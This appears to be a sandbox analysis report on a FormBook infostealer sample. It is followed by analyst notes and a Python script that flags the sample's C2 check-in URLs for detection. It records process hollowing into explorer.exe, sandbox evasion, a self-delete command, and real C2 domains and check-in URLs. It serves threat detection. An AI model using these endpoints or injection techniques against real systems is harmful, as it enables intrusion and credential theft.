Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_013269C0 mov eax, dword ptr fs:[00000030h] | 4_2_013269C0
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0129A9D0 mov eax, dword ptr fs:[00000030h] | 4_2_0129A9D0 (listed 6 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012C49D0 mov eax, dword ptr fs:[00000030h] | 4_2_012C49D0
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0133483A mov eax, dword ptr fs:[00000030h] | 4_2_0133483A (listed 2 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012CA830 mov eax, dword ptr fs:[00000030h] | 4_2_012CA830
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012B2835 mov eax, dword ptr fs:[00000030h] | 4_2_012B2835 (listed 3 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012B2835 mov ecx, dword ptr fs:[00000030h] | 4_2_012B2835
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012B2835 mov eax, dword ptr fs:[00000030h] | 4_2_012B2835 (listed 2 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0131C810 mov eax, dword ptr fs:[00000030h] | 4_2_0131C810
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_01326870 mov eax, dword ptr fs:[00000030h] | 4_2_01326870 (listed 2 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0131E872 mov eax, dword ptr fs:[00000030h] | 4_2_0131E872 (listed 2 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012A2840 mov ecx, dword ptr fs:[00000030h] | 4_2_012A2840
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_01294859 mov eax, dword ptr fs:[00000030h] | 4_2_01294859 (listed 2 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012C0854 mov eax, dword ptr fs:[00000030h] | 4_2_012C0854
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0131C89D mov eax, dword ptr fs:[00000030h] | 4_2_0131C89D
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_01290887 mov eax, dword ptr fs:[00000030h] | 4_2_01290887
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0135A8E4 mov eax, dword ptr fs:[00000030h] | 4_2_0135A8E4
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012CC8F9 mov eax, dword ptr fs:[00000030h] | 4_2_012CC8F9 (listed 2 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012BE8C0 mov eax, dword ptr fs:[00000030h] | 4_2_012BE8C0
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012BEB20 mov eax, dword ptr fs:[00000030h] | 4_2_012BEB20 (listed 2 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_01358B28 mov eax, dword ptr fs:[00000030h] | 4_2_01358B28 (listed 2 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0130EB1D mov eax, dword ptr fs:[00000030h] | 4_2_0130EB1D (listed 9 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0128CB7E mov eax, dword ptr fs:[00000030h] | 4_2_0128CB7E
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_01338B42 mov eax, dword ptr fs:[00000030h] | 4_2_01338B42
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_01326B40 mov eax, dword ptr fs:[00000030h] | 4_2_01326B40 (listed 2 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0135AB40 mov eax, dword ptr fs:[00000030h] | 4_2_0135AB40
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012A0BBE mov eax, dword ptr fs:[00000030h] | 4_2_012A0BBE (listed 2 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0131CBF0 mov eax, dword ptr fs:[00000030h] | 4_2_0131CBF0
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012BEBFC mov eax, dword ptr fs:[00000030h] | 4_2_012BEBFC
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_01298BF0 mov eax, dword ptr fs:[00000030h] | 4_2_01298BF0 (listed 3 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012B0BCB mov eax, dword ptr fs:[00000030h] | 4_2_012B0BCB (listed 3 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0133EBD0 mov eax, dword ptr fs:[00000030h] | 4_2_0133EBD0
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_01290BCD mov eax, dword ptr fs:[00000030h] | 4_2_01290BCD (listed 3 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012BEA2E mov eax, dword ptr fs:[00000030h] | 4_2_012BEA2E
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012CCA24 mov eax, dword ptr fs:[00000030h] | 4_2_012CCA24
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012CCA38 mov eax, dword ptr fs:[00000030h] | 4_2_012CCA38
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012B4A35 mov eax, dword ptr fs:[00000030h] | 4_2_012B4A35 (listed 2 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0131CA11 mov eax, dword ptr fs:[00000030h] | 4_2_0131CA11
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0130CA72 mov eax, dword ptr fs:[00000030h] | 4_2_0130CA72 (listed 2 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012CCA6F mov eax, dword ptr fs:[00000030h] | 4_2_012CCA6F (listed 3 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012A0A5B mov eax, dword ptr fs:[00000030h] | 4_2_012A0A5B (listed 2 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_01296A50 mov eax, dword ptr fs:[00000030h] | 4_2_01296A50 (listed 7 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_01298AA0 mov eax, dword ptr fs:[00000030h] | 4_2_01298AA0 (listed 2 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012E6AA4 mov eax, dword ptr fs:[00000030h] | 4_2_012E6AA4
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0129EA80 mov eax, dword ptr fs:[00000030h] | 4_2_0129EA80 (listed 9 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_01364A80 mov eax, dword ptr fs:[00000030h] | 4_2_01364A80
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012C8A90 mov edx, dword ptr fs:[00000030h] | 4_2_012C8A90
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012CAAEE mov eax, dword ptr fs:[00000030h] | 4_2_012CAAEE (listed 2 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012E6ACC mov eax, dword ptr fs:[00000030h] | 4_2_012E6ACC (listed 3 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_01290AD0 mov eax, dword ptr fs:[00000030h] | 4_2_01290AD0
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012C4AD0 mov eax, dword ptr fs:[00000030h] | 4_2_012C4AD0 (listed 2 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_01318D20 mov eax, dword ptr fs:[00000030h] | 4_2_01318D20
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_01348D10 mov eax, dword ptr fs:[00000030h] | 4_2_01348D10 (listed 2 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012AAD00 mov eax, dword ptr fs:[00000030h] | 4_2_012AAD00 (listed 3 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012C4D1D mov eax, dword ptr fs:[00000030h] | 4_2_012C4D1D
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_01286D10 mov eax, dword ptr fs:[00000030h] | 4_2_01286D10 (listed 3 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_01328D6B mov eax, dword ptr fs:[00000030h] | 4_2_01328D6B
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_01290D59 mov eax, dword ptr fs:[00000030h] | 4_2_01290D59 (listed 3 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_01298D59 mov eax, dword ptr fs:[00000030h] | 4_2_01298D59 (listed 5 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012C6DA0 mov eax, dword ptr fs:[00000030h] | 4_2_012C6DA0
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012B8DBF mov eax, dword ptr fs:[00000030h] | 4_2_012B8DBF (listed 2 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_01358DAE mov eax, dword ptr fs:[00000030h] | 4_2_01358DAE (listed 2 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_01364DAD mov eax, dword ptr fs:[00000030h] | 4_2_01364DAD
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012CCDB1 mov ecx, dword ptr fs:[00000030h] | 4_2_012CCDB1
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012CCDB1 mov eax, dword ptr fs:[00000030h] | 4_2_012CCDB1 (listed 2 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0128CDEA mov eax, dword ptr fs:[00000030h] | 4_2_0128CDEA (listed 2 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_01330DF0 mov eax, dword ptr fs:[00000030h] | 4_2_01330DF0 (listed 2 times)
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_009C51BD GetProcessHeap,HeapFree, | 6_2_009C51BD
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_009C7A38 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 6_2_009C7A38
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe | File created: HHhHh.exe.0.dr
Source: C:\Windows\explorer.exe | Network Connect: 103.169.142.0 80
Source: C:\Windows\explorer.exe | Network Connect: 198.54.117.242 80
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | NtQueueApcThread: Indirect: 0x123A4F2
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | NtClose: Indirect: 0x123A56C
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Memory written: C:\Users\user\AppData\Local\Temp\HHhHh.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Section loaded: NULL target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write (listed 2 times)
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Thread register set: target process: 1028
Source: C:\Windows\SysWOW64\wscript.exe | Thread register set: target process: 1028
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: 9B0000
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\HHhHh.exe "C:\Users\user\AppData\Local\Temp\HHhHh.exe"
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Process created: C:\Users\user\AppData\Local\Temp\HHhHh.exe "C:\Users\user\AppData\Local\Temp\HHhHh.exe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\HHhHh.exe"
Source: C:\Windows\SysWOW64\wscript.exe | Code function: GetLocaleInfoW,wcsncmp, | 6_2_009C7084
Source: C:\Windows\SysWOW64\wscript.exe | Code function: GetUserDefaultLCID,GetLocaleInfoW,GetModuleFileNameW,FreeLibrary,GetLocaleInfoA,LoadStringA,GetModuleFileNameA,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,sprintf_s,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,GetUserDefaultLCID,GetLocaleInfoA,sprintf_s,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA, | 6_2_009C544C
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\HHhHh.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_009C79A0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, | 6_2_009C79A0
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_009BB8C3 RegisterEventSourceW,GetUserNameW,LookupAccountNameW,LookupAccountNameW,ReportEventW,DeregisterEventSource,SysFreeString,RegCloseKey,RegCloseKey, | 6_2_009BB8C3
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_009B91C6 SysAllocString,GetVersionExA,IsTextUnicode,MultiByteToWideChar,GetLastError,SysAllocStringLen,MultiByteToWideChar,GetLastError,_swab,memmove,SysFreeString, | 6_2_009B91C6
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 4.2.HHhHh.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.HHhHh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: 4.2.HHhHh.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.HHhHh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_009B9D9A CreateBindCtx,SysFreeString,SysAllocStringByteLen, | 6_2_009B9D9A
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_009C1170 CreateBindCtx,CreateFileMoniker,MkParseDisplayName, | 6_2_009C1170
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_009BDEED CoCreateInstance,CoCreateInstance,GetUserDefaultLCID,CoGetClassObject,CreateBindCtx, | 6_2_009BDEED
MITRE ATT&CK Matrix (a number in front of a technique name is the count shown in the report for that technique)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 1 Shared Modules | 1 Scripting | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 611 Process Injection | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 4 Obfuscated Files or Information | NTDS | 224 System Information Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 231 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 41 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 41 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 611 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph (ID: 1482976, Sample: TNS71092E68UI0.vbe, Startdate: 26/07/2024, Architecture: WINDOWS, Score: 100)

Process tree and findings recovered from the graph:

• TNS71092E68UI0.vbe (start)
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 5 other signatures
  DNS/IP: www.tateshades.xyz; www.legalix.xyz (Performs DNS queries to domains with low reputation); 14 other IPs or domains
  • wscript.exe (started)
    Dropped file: C:\Users\user\AppData\Local\Temp\HHhHh.exe, PE32
    Signatures: Benign windows process drops PE files; Windows Scripting host queries suspicious COM object (likely to drop second stage)
    • HHhHh.exe (started)
      Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file; Tries to detect virtualization through RDTSC time measurements; 2 other signatures
      • HHhHh.exe (started)
        Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
        • explorer.exe (injected)
          DNS/IP: www.tateshades.xyz 198.54.117.242, 49716, 80 NAMECHEAP-NETUS United States; especialistaleitura.online 195.35.41.249, 49721, 80 MTSRU Germany; 3 other IPs or domains
          Signatures: System process connects to network (likely due to code injection or exploit)
          • wscript.exe (started)
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
            • cmd.exe (started)
              • conhost.exe (started)

Antivirus, machine learning and reputation results

Initial sample
Source | Detection | Scanner | Label
TNS71092E68UI0.vbe | 17% | Virustotal |

Dropped files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\HHhHh.exe | 100% | Avira | HEUR/AGEN.1357443
C:\Users\user\AppData\Local\Temp\HHhHh.exe | 100% | Joe Sandbox ML |

Unpacked PE files
No Antivirus matches

Domains
No Antivirus matches

URLs
Source | Detection | Scanner | Label
http://www.gyosei-arimura.com/de94/?jBZ=DixB1qykAeF3P3PXJeHdSknPWO1HgPnInxoSQIfAm9wP6zKJEe36YOPFRPwN1ZbEVsUi&iH=L48pdJnx | 0% | Avira URL Cloud | safe
www.happygreenfarm.com/de94/ | 0% | Avira URL Cloud | safe
http://www.ashleymorgan.live/de94/?iH=L48pdJnx&jBZ=5tT0wx6F9dDlvd0I7/Gf0Z876YhP5UCSCTQNI7gCLgEp6gs1sNLPrbs4iKZbSyW3sHh4 | 0% | Avira URL Cloud | safe
http://www.rendamaisbr.com/de94/?jBZ=oGEpRlg+OmPq0B7KIcYot+ASNw6YPmukejZMyF938WrRMvUmELkE1jbD5t8azbvrsm6P&iH=L48pdJnx | 0% | Avira URL Cloud | safe
http://www.tateshades.xyz/de94/?iH=L48pdJnx&jBZ=KxdOA0Mo1WZhrruLdWg4BGjiUazPRKkva+c6BVUkR9pg9lvbFJGOvuIlGrqlewJrvTBn | 0% | Avira URL Cloud | safe

Note the gap between the scanners: the initial script scores only 17% on VirusTotal and every C2 URL is rated "safe" by URL reputation, while the dropped loader is detected at 100% and the same hosts are flagged malicious in the domain and IDS tables further down. URL reputation lags freshly registered campaign domains, so a "safe" label here must not be used to down-rank the FormBook check-in alerts.
Contacted domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
especialistaleitura.online | 195.35.41.249 | true | true | | unknown
host.websitepro.hosting | 34.149.86.124 | true | false | | unknown
www.rendamaisbr.com | 104.21.29.136 | true | false | | unknown
www.tateshades.xyz | 198.54.117.242 | true | true | | unknown
www.gyosei-arimura.com | 103.169.142.0 | true | true | | unknown
ashleymorgan.live | 79.133.41.250 | true | true | | unknown
rtproketslotcsn.art | 67.223.118.63 | true | true | | unknown
ext-sq.squarespace.com | 198.185.159.144 | true | false | | unknown
www.21stcut.shop | 103.224.182.210 | true | false | | unknown
www.ashleymorgan.live | unknown | unknown | true | | unknown
www.especialistaleitura.online | unknown | unknown | true | | unknown
www.legalix.xyz | unknown | unknown | true | | unknown
www.rtproketslotcsn.art | unknown | unknown | true | | unknown
www.gv031.net | unknown | unknown | true | | unknown
www.exploringtheoutdoors.net | unknown | unknown | true | | unknown
www.invigoratewell.com | unknown | unknown | true | | unknown

The www.* entries with an unknown IP did not resolve during the run; they are flagged malicious on the strength of the extracted C2 configuration rather than observed traffic. FormBook configurations pad the C2 list with decoy domains, and the report itself marks hosts such as ext-sq.squarespace.com (a Squarespace edge) and the Cloudflare-fronted www.rendamaisbr.com as non-malicious, so block-listing should be limited to the hosts flagged here and corroborated by the Suricata check-in alerts rather than applied to the whole list.
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://www.gyosei-arimura.com/de94/?jBZ=DixB1qykAeF3P3PXJeHdSknPWO1HgPnInxoSQIfAm9wP6zKJEe36YOPFRPwN1ZbEVsUi&iH=L48pdJnx | true | Avira URL Cloud: safe | unknown
http://www.ashleymorgan.live/de94/?iH=L48pdJnx&jBZ=5tT0wx6F9dDlvd0I7/Gf0Z876YhP5UCSCTQNI7gCLgEp6gs1sNLPrbs4iKZbSyW3sHh4 | false | Avira URL Cloud: safe | unknown
http://www.rendamaisbr.com/de94/?jBZ=oGEpRlg+OmPq0B7KIcYot+ASNw6YPmukejZMyF938WrRMvUmELkE1jbD5t8azbvrsm6P&iH=L48pdJnx | false | Avira URL Cloud: safe | unknown
http://www.tateshades.xyz/de94/?iH=L48pdJnx&jBZ=KxdOA0Mo1WZhrruLdWg4BGjiUazPRKkva+c6BVUkR9pg9lvbFJGOvuIlGrqlewJrvTBn | true | Avira URL Cloud: safe | unknown
www.happygreenfarm.com/de94/ | true | Avira URL Cloud: safe | unknown

All five URLs share the path segment /de94/ and, where a query is present, the constant parameter iH=L48pdJnx with a second long Base64-looking parameter. The shared path and constant parameter are campaign-level data: they identify the FormBook configuration across every domain it rotates through, which makes them a better pivot than any single hostname.
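The pivot described above, as an added example for this page (not code from the Joe Sandbox report or from the sample): a heuristic matcher for the check-in URL shape seen in this report and a grouping of hosts by shared path and constant parameter. The length thresholds and the four-character path rule are assumptions chosen to fit the URLs listed above, not a published FormBook signature; the benign look-alike URLs are constructed.

```python
"""Triage of FormBook-style HTTP check-in URLs.

Added example for this page, not code from the Joe Sandbox report or from the
sample. The heuristic is derived from the five URLs listed above: one short
lower-case alphanumeric path segment (/de94/), a query of exactly two parameters,
one short and one long value in the Base64 alphabet. The length thresholds are
assumptions chosen to fit those URLs, not a published FormBook signature.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed input: the URLs from the report (a scheme was added to the
# schemeless www.happygreenfarm.com entry) plus two benign look-alikes.
REPORT_URLS = [
    "http://www.gyosei-arimura.com/de94/?jBZ=DixB1qykAeF3P3PXJeHdSknPWO1HgPnInxoSQIfAm9wP6zKJEe36YOPFRPwN1ZbEVsUi&iH=L48pdJnx",
    "http://www.ashleymorgan.live/de94/?iH=L48pdJnx&jBZ=5tT0wx6F9dDlvd0I7/Gf0Z876YhP5UCSCTQNI7gCLgEp6gs1sNLPrbs4iKZbSyW3sHh4",
    "http://www.rendamaisbr.com/de94/?jBZ=oGEpRlg+OmPq0B7KIcYot+ASNw6YPmukejZMyF938WrRMvUmELkE1jbD5t8azbvrsm6P&iH=L48pdJnx",
    "http://www.tateshades.xyz/de94/?iH=L48pdJnx&jBZ=KxdOA0Mo1WZhrruLdWg4BGjiUazPRKkva+c6BVUkR9pg9lvbFJGOvuIlGrqlewJrvTBn",
    "http://www.happygreenfarm.com/de94/",
]
BENIGN_URLS = [
    "http://www.example.com/search/?q=formbook&page=2",
    "http://www.example.org/de94/index.html",
]

PATH_RE = re.compile(r"^/([a-z0-9]{4})/$")          # exactly one 4-char segment
B64_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")   # long value in Base64 alphabet


def split_query(query):
    """Split a raw query string without decoding, so '+' inside Base64 survives.
    (urllib.parse.parse_qsl would turn '+' into a space.)"""
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        pairs.append((key, value))
    return pairs


def is_checkin(url):
    """True when the URL has the check-in shape seen in this report."""
    parts = urlsplit(url)
    if not PATH_RE.match(parts.path):
        return False
    params = split_query(parts.query)
    if len(params) != 2:
        return False
    short, long_ = sorted((v for _, v in params), key=len)
    return 4 <= len(short) <= 16 and B64_RE.match(long_) is not None


def pivot_by_path(urls):
    """Group hostnames by the shared path segment: one confirmed check-in URL
    exposes the rest of the campaign's domain list, including entries seen
    without a query string."""
    groups = defaultdict(set)
    for url in urls:
        parts = urlsplit(url)
        m = PATH_RE.match(parts.path)
        if m:
            groups[m.group(1)].add(parts.hostname)
    return {path: sorted(hosts) for path, hosts in groups.items()}


def shared_params(urls):
    """Query parameters whose value is identical in every check-in URL.
    A constant such as iH=L48pdJnx is campaign-level data and a second pivot."""
    common = None
    for url in urls:
        if not is_checkin(url):
            continue
        params = dict(split_query(urlsplit(url).query))
        if common is None:
            common = dict(params)
        else:
            common = {k: v for k, v in common.items() if params.get(k) == v}
    return common or {}


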